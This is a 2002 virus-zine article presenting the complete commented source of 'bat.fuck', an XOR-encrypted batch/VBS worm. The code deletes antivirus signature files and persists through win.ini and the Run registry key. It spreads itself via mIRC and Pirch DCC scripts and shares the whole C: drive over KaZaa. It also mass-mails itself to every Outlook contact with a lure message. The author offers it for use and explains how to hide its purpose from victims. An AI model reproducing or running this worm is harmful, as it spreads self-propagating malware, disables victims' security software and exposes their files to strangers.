     +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
    /  bat.fuck by philet0ast3r [rRlf]  /
   +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+

                  010101
                 10010001  00     001101001
                 00    01  11    01110011010
                 01    11  00    00       11
                 10   010  10    11       00
       100100110101100010  00    00       10
    0100011100100101011    01    01      01
  01010          01        101100110001010
 0101          01100010    11001001010001
  1001       01011000110         10
    010      100 10   0110       01
     110   011   01     0001     11
      011 010    01       0100   00
       0110      10         1010 10
        10       00           01101
        00       11              01

             www.rRlf.de

Hehe, here I am again, the guy with the encrypted batch.
Presenting you now the very improved version of the first encrypted
batch-virus/worm, BAT.Calvin&Hobbes (by me and alcopaul).
This one is a lot faster and smaller, and the main-code is
encrypted directly (not as in it's predecesor).
It was written June 2002, and it is my 13th virus, and very probably
the last virus I'll write for a zine (well, I won't stop writing virii
in general ;) . This one's for Black Cat Virii Group E-Zine #2, and
should be a presentation, how batch-encryption can be done.
Again the name: bat.fuck
(repeat reading it until you get at least three meanings ;)
Nevertheless, here are some facts:
-encrypted (thanks a lot to my friend alcopaul,
 for help with the encryption/decryption vbs)
-Outlook worm (with the help of a quite common vbs)
 subject: Ever saw an encrypted batch-worm? N0? then it's time!
 body: Well, you don't have to execute the attachment
       (if you don't want to ;) ... hey, at least look at it!
       You can boast at your friends this evening at the strip:
       'Hey comrades, today I saw an encrypted batch-worm!'
       ... Isn't that fascinating ?!
-mIRC worm
-pirch worm
-KaZaa worm
-"residency" through win.ini
-retro: Norton AntiVirus 2000, AntiVir /9X Personal Edition,
 F-Prot 95, McAfee, Thunderbyte
-payload: creates a little vbs, showing this message on every system-start:
                   bat.fuck
     ...be sure to get all the meanings...
 (ah, this is a presentation of encrypted batch ;)
 message box title: bat.fuck by philet0ast3r [rRlf]
-fully compatible to Windows ME, Windows 98, Windows 95 (has been tested)
-size: 6.522 bytes
-AV-names: I-Worm.Eversaw, BAT/Tryc, BAT_EVERSAW.A, EVERSAW.A, EVERSAW,
 VBS_ EVERSAW.A, IRC_ EVERSAW.A

philet0ast3r likes to greet/thank: 3ri5, alcopaul [rRlf], disc0rdia [rRlf],
dr.g0nZo [rRlf], El DudErin0 [rRlf], ppacket [rRlf], BeLiAL [BC],
Satanico [BC], Zoom23 [PVW], PetiK, toro [TKT], Benny [29A], herm1t,
mgl [*], rastafarie, Necronomikon [ZG], Energy, SnakeByte [MVX], nuerble,
BTK, ToxiC, pissn3lk [AFN], MalFunction, Senna Spy, Zarrmann, ina,
El Commandante, bafra, Mindjuice.

Ok, to say something to the encryption-technique:
The encrypted code has to be at the beginning, then follows the
decryption/encryption utility (here a vbs).
A spawned copy of the running file can now be decrypted and executed.
One part of the code is always encrypted, and so junk (no valid batch-commands).
When the virus is encrypted, the decryption/encryption and rest are not.
When the virus gets decrypted, the decryption/encryption and so get encrypted,
turning this now to junk. So after decryption, the junk is at the end of the file.
To cause no errors, the virus has to exit dos-mode at the end (see code).
But before, encrypt itself again, so that we get the the same file
as at the beginning.

Well, here is the code ... with comments "::"
These comments refer always to the code above and should be removed to
"compile" virus. But for the lazy ones: It's not neccessary, but decreases size
... and the victim does not know that easy what this batch is doing ;)
Phile-name is equal, but has to end with ".bat" :D

=====[begin code]===============================================================
˄ሟ˅љᏎˈѷڷقŏᏎˈѷƛ޷ŏᏎˈѷŏᏎˈѷ޷ŘᏎˈѷŏᏎˈѷŏᏎˈѷŝћᎈńˎ˙˅Ոѷŝᎈ˦ˉō˨˨ŉ˘˟ˌˊ˟ˆ˨˨Ê˟˂ˊ˛˄ˎˉɉōˉ˛ۊؙ˰Ոѷŝᎈ˹՛řᎈ˰՛řᎈɆɈѷŝ՛řᙎĘ˛řљᎈ˰ՙᎈˇֈѷōŉՙᎈ˙ՙᎈ˥֥ՙᎈՙሄ˙ΜηłΜηłᏎΜηłᆄΜηłΜηłᏎ˙цᏎˈѷłᏎˈѷٷłᏎˈѷڷłᏎˈѷڷٷłᎈ˰Նᎈ˅քѡѐՆᎈ˅Ă˅φː˃˖Նᎈ˅ŏ˘υˈѷōŉՆᎈ˅֖ՆᆄˆˈѷłᆄˆˈѷٷłᆄˆˈѷڷłᆄˆˈѷڷٷłᏎˆћᏎˈѷӷłᎈ˰՛ᎈˮ՛ᎈ˨՛ᎈ˧ƾ՛ᎈƾ՛ᎈ˧Ƨ՛ᎈƧۮ՛ᎈ˧Ƨ՛ᎈƧۮ՛ᎈ˧Ƨ՛ᎈƧۮ՛ᎈ˧Ƨ՛ᎈƧۮ՛ᎈ˧Ƨ՛ᎈƧۮ՛ᎈ՛ᎈ˰ƾ՛ᎈ˾՛ᎈ˾՛ᎈˮ֤ˡď˘υˈѷōŉ՛ᎈˮ՛ᎈ՛ᎈ˰Ƨ۶՛ᎈ˾՛ᎈˮ՛ᎈ՛ᎈ˰Ƨ۶՛ᎈ˾՛ᎈˮ՛ᎈ՛ᎈ˰Ƨ۶՛ᎈ˾՛ᎈˮ՛ᎈ՛ᎈ˰Ƨ۶՛ᎈ˾՛ᎈˮ՛ᎈ՛ᎈ˰Ƨ۶՛ᎈ˾՛ᎈˮ՛ᆄ˛ˈѷӷłᏎ˛рᎈ˹Հřᎈ˰Հřᎈɯ֏Հřᎈɯɨѷ˭˸˭ՀřᎈɯшѷՀřᙎĘˀřфᎈńˎ˙˅ՄᎈˏˊǉǈǏǎՄᎈ˘ˊ˼ŨɼŸՄᎈ˘ˉ˨ɤŪՄᎈ˘ˈˉŬɦՄᎈˍ˒˿ˈŪŨՄᎈ˘ˏˈŪÒՄᎈ˓Մᎈ˘ˎˉŨՄᎈˍ˄˿ˏŪŨՄᎈˍˏŪÓՄᎈˎŹŪˍՄᎈ˓˓Մᎈ˅ՄᎈˎŸɮ˘ˊˎˉƜ˥˟˂̘˟Մᎈˎũɼ˒ˏ̟˃˟ˎ˟ˊÂ˒ˏ̟˜˟˃ˊˇˇˊ˂˲ˈˉˊ˒ˍ˟ˎˊ˟˘̣ˈ˟ˢ˘ˊˎˉƜˢ̟˟ˍՄᎈˎŪŪɈѷōŉՄᎈˎů˭ՄᎈˎŸՄᎈˍՄᎈ˅Մᆄ˄ΜηŝᘟΜηŝюᏎ˛řᏎˀřᘟΜηŝ᎓


:: ah great, isn't it? the above is the actual virus
:: because these are no valid batch-commands, nothing happens,
:: just some error-messages occur

@echo off
cls

:: this clears the screen of the error-messages

ctty nul
copy %0 c:\bat.fuck.bat

:: the running file is copied to c:\bat.fuck.bat

if exist %winbootdir%\crypt.vbs goto tralala

:: if the decryption/encryption -vbs already exists,
:: this debugging can be jumped over

echo e 0100 6F 6E 20 65 72 72 6F 72 20 72 65 73 75 6D 65 20>crypt
echo e 0110 6E 65 78 74 0D 0A 73 65 74 20 66 73 6F 20 3D 20>>crypt
echo e 0120 63 72 65 61 74 65 6F 62 6A 65 63 74 28 22 73 63>>crypt
echo e 0130 72 69 70 74 69 6E 67 2E 66 69 6C 65 73 79 73 74>>crypt
echo e 0140 65 6D 6F 62 6A 65 63 74 22 29 0D 0A 73 65 74 20>>crypt
echo e 0150 70 72 6F 63 34 20 3D 20 66 73 6F 2E 6F 70 65 6E>>crypt
echo e 0160 74 65 78 74 66 69 6C 65 28 22 63 3A 5C 62 61 74>>crypt
echo e 0170 2E 66 75 63 6B 2E 62 61 74 22 2C 20 31 29 0D 0A>>crypt
echo e 0180 6D 73 67 20 3D 20 70 72 6F 63 34 2E 72 65 61 64>>crypt
echo e 0190 61 6C 6C 0D 0A 64 64 64 20 3D 20 78 28 6D 73 67>>crypt
echo e 01A0 29 0D 0A 73 65 74 20 70 72 6F 63 32 20 3D 20 66>>crypt
echo e 01B0 73 6F 2E 63 72 65 61 74 65 74 65 78 74 66 69 6C>>crypt
echo e 01C0 65 28 22 63 3A 5C 62 61 74 2E 66 75 63 6B 2E 62>>crypt
echo e 01D0 61 74 22 2C 20 74 72 75 65 29 0D 0A 70 72 6F 63>>crypt
echo e 01E0 32 2E 77 72 69 74 65 6C 69 6E 65 20 64 64 64 0D>>crypt
echo e 01F0 0A 70 72 6F 63 32 2E 63 6C 6F 73 65 0D 0A 46 75>>crypt
echo e 0200 6E 63 74 69 6F 6E 20 78 28 73 54 65 78 74 29 0D>>crypt
echo e 0210 0A 4F 6E 20 45 72 72 6F 72 20 52 65 73 75 6D 65>>crypt
echo e 0220 20 4E 65 78 74 0D 0A 44 69 6D 20 65 6B 65 79 2C>>crypt
echo e 0230 20 69 2C 20 68 61 73 68 2C 20 63 72 62 79 74 65>>crypt
echo e 0240 0D 0A 65 6B 65 79 20 3D 20 32 33 35 0D 0A 46 6F>>crypt
echo e 0250 72 20 69 20 3D 20 31 20 54 6F 20 4C 65 6E 28 73>>crypt
echo e 0260 54 65 78 74 29 0D 0A 68 61 73 68 20 3D 20 41 73>>crypt
echo e 0270 63 28 4D 69 64 28 73 54 65 78 74 2C 20 69 2C 20>>crypt
echo e 0280 31 29 29 0D 0A 63 72 62 79 74 65 20 3D 20 43 68>>crypt
echo e 0290 72 28 68 61 73 68 20 58 6F 72 20 28 65 6B 65 79>>crypt
echo e 02A0 20 4D 6F 64 20 32 35 35 29 29 0D 0A 78 20 3D 20>>crypt
echo e 02B0 78 20 26 20 63 72 62 79 74 65 0D 0A 4E 65 78 74>>crypt
echo e 02C0 0D 0A 45 6E 64 20 46 75 6E 63 74 69 6F 6E 0D 0A>>crypt
echo e 02D0 C6>>crypt
echo rcx>>crypt
echo 01D0>>crypt
echo n crypt.vbs>>crypt
echo w>>crypt
echo q>>crypt
debug<crypt
del crypt
move crypt.vbs %winbootdir%

:: this is the debug-script of the decryption/encryption -vbs
:: code see below

:tralala
start %winbootdir%\crypt.vbs
start c:\bat.fuck.bat

:: the decryption/encryption -vbs gets executed,
:: and then the virus from c:\bat.fuck.bat

:end
exit
=====[end code]=================================================================

And here is the code of the decryption/encryption -vbs:

=====[begin code]===============================================================
on error resume next
set fso = createobject("scripting.filesystemobject")
set proc4 = fso.opentextfile("c:\bat.fuck.bat", 1)
msg = proc4.readall
ddd = x(msg)
set proc2 = fso.createtextfile("c:\bat.fuck.bat", true)
proc2.writeline ddd
proc2.close
Function x(sText)
On Error Resume Next
Dim ekey, i, hash, crbyte
ekey = 235
For i = 1 To Len(sText)
hash = Asc(Mid(sText, i, 1))
crbyte = Chr(hash Xor (ekey Mod 255))
x = x & crbyte
Next
End Function

=====[end code]=================================================================

And finally the code of the actual virus, again with comments:

=====[begin code]===============================================================
@echo off
ctty nul
:retro
del c:\programme\norton~1\s32integ.dll
del c:\programme\f-prot95\fpwm32.dll
del c:\programme\mcafee\scan.dat
del c:\tbavw95\tbscan.sig
del c:\programme\tbav\tbav.dat
del c:\tbav\tbav.dat
del c:\programme\avpersonal\antivir.vdf

:: the AVs will get problems scanning without those files

:payload
echo.on error resume next>c:\payload.vbs
echo MsgBox "                              bat.fuck" & Chr(13) & Chr(10) & "          ...be sure to get all the meanings..." & Chr(13) & Chr(10) & "(ah, this is a presentation of encrypted batch ;)",4096,"bat.fuck by philet0ast3r [rRlf]">>c:\payload.vbs

:: this is the creation of the payload-vbs

echo REGEDIT4>payload.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>payload.reg
echo "msg"="c:\\payload.vbs">>payload.reg
regedit /s payload.reg

:: a registry entry to run the payload-vbs on every system-start

:residency
echo [windows]>residency
echo load=c:\bat.fuck.bat>>residency
echo run=>>residency
echo NullPort=None>>residency
echo.>>residency

:: the part to be added to the win.ini for the "residency" gets created...

copy residency + %winbootdir%\win.ini %winbootdir%\system\win.ini
del %winbootdir%\win.ini
move %winbootdir%\system\win.ini %winbootdir%\win.ini
del residency

:: ...and copied in front of the win.ini

:mirc
del c:\mirc\script.ini
del c:\mirc32\script.ini
del c:\progra~1\mirc\script.ini
del c:\progra~1\mirc32\script.ini
echo [script]>mirc
echo n0=on 1:JOIN:#:{>>mirc
echo n1= /if ( nick == $me ) { halt }>>mirc
echo n2= /.dcc send $nick c:\bat.fuck.bat>>mirc
echo n3=}>>mirc
move mirc c:\mirc\script.ini
move mirc c:\mirc32\script.ini
move mirc c:\progra~1\mirc\script.ini
move mirc c:\progra~1\mirc32\script.ini
del mirc

:: a mIRC-script-file gets created, and copied to a possible mIRC-directory
:: all it does is dccing the virus to a persons who enters a channel,
:: where the victim is in

:pirch
del c:\pirch98\events.ini
echo [Levels]>pirch
echo Enabled=1>>pirch
echo Count=6>>pirch
echo Level1=000-Unknowns>>pirch
echo 000-UnknownsEnabled=1>>pirch
echo Level2=100-Level 100>>pirch
echo 100-Level 100Enabled=1>>pirch
echo Level3=200-Level 200>>pirch
echo 200-Level 200Enabled=1>>pirch
echo Level4=300-Level 300>>pirch
echo 300-Level 300Enabled=1>>pirch
echo Level5=400-Level 400>>pirch
echo 400-Level 400Enabled=1>>pirch
echo Level6=500-Level 500>>pirch
echo 500-Level 500Enabled=1>>pirch
echo.>>pirch
echo [000-Unknowns]>>pirch
echo User1=*!*@*>>pirch
echo UserCount=1>>pirch
echo Event1=ON JOIN:#:/dcc send $nick c:\bat.fuck.bat>>pirch
echo EventCount=1>>pirch
echo.>>pirch
echo [100-Level 100]>>pirch
echo UserCount=0>>pirch
echo EventCount=0>>pirch
echo.>>pirch
echo [200-Level 200]>>pirch
echo UserCount=0>>pirch
echo EventCount=0>>pirch
echo.>>pirch
echo [300-Level 300]>>pirch
echo UserCount=0>>pirch
echo EventCount=0>>pirch
echo.>>pirch
echo [400-Level 400]>>pirch
echo UserCount=0>>pirch
echo EventCount=0>>pirch
echo.>>pirch
echo [500-Level 500]>>pirch
echo UserCount=0>>pirch
echo EventCount=0>>pirch
move pirch c:\pirch98\events.ini
del pirch

:: a pirch-script-file gets created, and copied to the standard pirch-directory,
:: if it exists
:: it does the same as the mIRC-script-file, only that it's for pirch ;]

:kazaa
echo REGEDIT4>kazaa.reg
echo [HKEY_CURRENT_USER\Software\Kazaa\LocalContent]>>kazaa.reg
echo "DisableSharing"=dword:00000000>>kazaa.reg
echo "DownloadDir"="C:\\Program Files\\KaZaA\\My Shared Folder">>kazaa.reg
echo "Dir0"="012345:c:\\">>kazaa.reg
regedit /s kazaa.reg

:: a registry entry, that enables all files in c:\ (where the virus is in, too)
:: for sharing with KaZaa (see last line of the reg.file)

:outlook
echo.on error resume next>outlook
echo dim a,b,c,d,e>>outlook
echo set a = Wscript.CreateObject("Wscript.Shell")>>outlook
echo set b = CreateObject("Outlook.Application")>>outlook
echo set c = b.GetNameSpace("MAPI")>>outlook
echo for y = 1 To c.AddressLists.Count>>outlook
echo set d = c.AddressLists(y)>>outlook
echo x = 1>>outlook
echo set e = b.CreateItem(0)>>outlook
echo for o = 1 To d.AddressEntries.Count>>outlook
echo f = d.AddressEntries(x)>>outlook
echo e.Recipients.Add f>>outlook
echo x = x + 1>>outlook
echo next>>outlook
echo e.Subject = "Ever saw an encrypted batch-worm? N0? then it's time!">>outlook
echo e.Body = "Well, you don't have to execute the attachment (if you don't want to ;) ... hey, at least look at it! You can boast at your friends this evening at the strip: 'Hey comrades, today I saw an encrypted batch-worm!' ... Isn't that fascinating ?! ">>outlook
echo e.Attachments.Add ("c:\bat.fuck.bat")>>outlook
echo e.DeleteAfterSubmit = False>>outlook
echo e.Send>>outlook
echo f = "">>outlook
echo next>>outlook
move outlook %winbootdir%\outlook.vbs
start %winbootdir%\outlook.vbs

:: this is a vbs that sends the virus away through Outlook

:end
del payload.reg
del kazaa.reg
start %winbootdir%\crypt.vbs
exit

:: the virus encrypts itself again, and then exits dos-mode,
:: to cause no errors, because of the decryption/encryption stuff
:: (that's now encrypted and junk), that would follow



:: this ("") is something left over from the decryption/encryption process
:: but it does not matter, because the virus exits before
:: it just grows a little bit, everytime when executed
:: you could call this some very lame polymorphic ... hehe, ah, not really ;]]
=====[end code]=================================================================

That's all, ppl. Hope this enjoyed you a bit.
And remember, batch is in no way dead yet...

Something you want to tell me? ... Equal what:
philet0ast3r@rRlf.de